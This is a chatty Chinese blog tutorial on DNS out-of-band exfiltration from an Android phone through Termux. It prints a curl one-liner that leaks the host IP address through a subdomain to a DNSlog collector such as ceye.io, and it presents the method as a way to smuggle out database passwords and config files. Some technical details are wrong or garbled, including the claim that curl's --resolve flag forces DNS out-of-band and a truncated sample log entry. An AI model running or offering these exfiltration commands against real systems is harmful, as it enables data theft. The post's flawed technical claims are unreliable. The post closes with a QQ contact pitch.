手机上怎么DNS带外

极客

手机上怎么DNS带外?别慌,我教你用手机当黑客的“秘密通道”!

哎,说到DNS带外,估计好多朋友一听就头大——啥玩意儿?听着跟天书似的,别急别急,今儿咱不聊那些晦涩难懂的代码,就唠唠手机上怎么DNS带外,用大白话把这门“骚操作”给你整明白,说真的,这玩意儿要是玩明白了,手机在你手里就不是手机了,是个“隐形传话筒”啊!

先说说我为啥要碰这个:前阵子搞渗透测试,电脑没带,就剩个手机,急得我直挠头,结果你猜怎么着?还真让我用手机把数据给“偷”出来了!那一刻,我差点没从沙发上蹦起来——原来手机真能干这活儿!所以啊,这篇文章就是给跟我一样爱折腾的朋友写的,保证你看完能少走弯路。

先说人话:DNS带外到底是个啥?

嘿,你肯定听过DNS吧?就是那个把你输入的网址“翻译”成IP地址的“电话本”,那“带外”呢?就好比你跟别人说话,明面上聊的是天气,但暗地里用摩斯密码敲桌子传递情报——DNS带外就是干这个的!你让目标服务器去解析一个你控制的域名,数据就藏在域名里传出来了,防火墙还傻乎乎以为就是正常上网呢。

那手机上怎么搞?核心就仨字:造域名、传数据、收信息,别慌,一步步来。

手机必备工具,少了它们可真不行

咱们不是黑客电影里那种炫酷界面,手机上就得靠App,我常用的就这几样,你记好了:

  • Termux(安卓的神器,就是个微型Linux终端,啥都能装)
  • Python + scapy 或者 curl(用来发请求,Termux里直接装就行)
  • 一台能解析DNS的服务器(比如用自己的VPS或者在线DNSlog平台)

iPhone的话,你得用 iSH 或者远程SSH连电脑,不然真没安卓方便——不是我偏心,是现实摆在眼前,安卓的Termux简直是为折腾而生的!

实操!手机上三步搞定DNS带外

第一步:搞个能记录DNS查询的“耳朵”
我一般用DNSlog平台,比如ceye.io或者dnslog.cn,免费注册个账号,它会给你一个专属子域名,比如xxxx.ceye.io,记住啊,这一步千万别嫌麻烦,没这个耳朵,你数据传出来也听不见。

第二步:在Termux里构造“秘密请求”
打开Termux,先装环境:

pkg update && pkg install curl python -y

假设你想把本机的IP地址传出去,可以这么玩:

curl "http://$(hostname -I | awk '{print $1}').你的专属域名.ceye.io"

看见没?IP地址直接变成域名前缀发过去了!这时候你手心可能都冒汗了——别紧张,这操作在目标机器上跑通,你就能在外面看到信息了。

第三步:去DNSlog平台看“回信”
登录平台,刷新记录,你会看到类似168.1.5.你的专属域名的查询记录。那一刻,成就感直接拉满!手机真的当间谍用了。

最关键的坑,我替你踩过了!

哎呀,说到这我得抱怨几句——第一次搞的时候,我差点砸手机!为啥?数据死活传不出去,最后发现是Termux的curl默认不走DNS带外,得加个 --resolve 参数强制解析,还有,别用中文域名,DNS解析直接给你撂挑子!

另外一个坑就是ADB权限:有些手机后台会拦截陌生DNS查询,你得在开发者选项里关掉“私人DNS”或者“安全DNS”,不然数据全被拦在“门卫”那儿了,我当时就是栽在这儿,愣是折腾了两小时。

写在最后:这玩意儿能干嘛用?

你可能觉得,这有啥用?我告诉你,在网络安全测试里,这叫“数据外带”——红队拿不到shell的时候,就用这招把数据库密码、配置文件悄悄传出来,平时你也能拿来自测,看看自己的网络有没有偷偷泄露数据,说白了就是给手机X个“CT机”

记住啊,这玩意儿只能用在你自己有权限的设备上,别拿去搞歪门邪道,不然哪天警察叔叔敲门,我可救不了你(手动狗头)。

手机上怎么DNS带外

好啦,就唠叨到这儿。你要是真对网络安全感兴趣,想学更多“奇技淫巧”,别一个人瞎琢磨了,加QQ:3352802800,咱们一起交流,指不定下个安全大牛就是你!我可是把自己踩过的坑全掏给你了,还不快动手试试?

文章版权声明:除非注明,否则均为咸鱼-即刻攻防原创文章,转载或复制请以超链接形式并注明出处。

目录[+]

取消
微信二维码
微信二维码
支付宝二维码